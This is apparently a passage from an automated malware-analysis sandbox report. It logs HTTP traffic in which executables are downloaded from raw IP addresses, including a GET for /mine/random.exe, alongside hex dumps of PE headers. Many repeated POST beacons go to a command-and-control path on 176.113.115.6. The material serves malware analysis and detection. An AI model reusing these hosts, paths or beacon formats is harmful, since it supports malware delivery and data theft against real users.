05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c4 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:52:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 12:55:15 GMTETag: "1f8e00-62fc0224abf6e"Accept-Ranges: bytesContent-Length: 2067968Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 ae 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 f5 e9 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 f0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 00 06 00 00 02 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 20 06 00 00 02 00 00 00 04 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 7a 68 65 68 77 6d 63 00 70 19 00 00 f0 2f 00 00 62 19 00 00 06 06 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 72 6f 65 6c 78 6c 6f 61 00 10 00 00 00 60 49 00 00 04 00 00 00 68 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 49 00 00 22 00 00 00 6c 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:52:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 27 Feb 2025 10:26:42 GMTETag: "57a00-62f1d204740f0"Accept-Ranges: bytesContent-Length: 358912Content-Type: application/x-msdos-program
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:52:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 08 Mar 2025 05:38:10 GMTETag: "1ac00-62fce24f7ee2b"Accept-Ranges: bytesContent-Length: 109568Content-Type: application/x-msdos-program
                                    Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
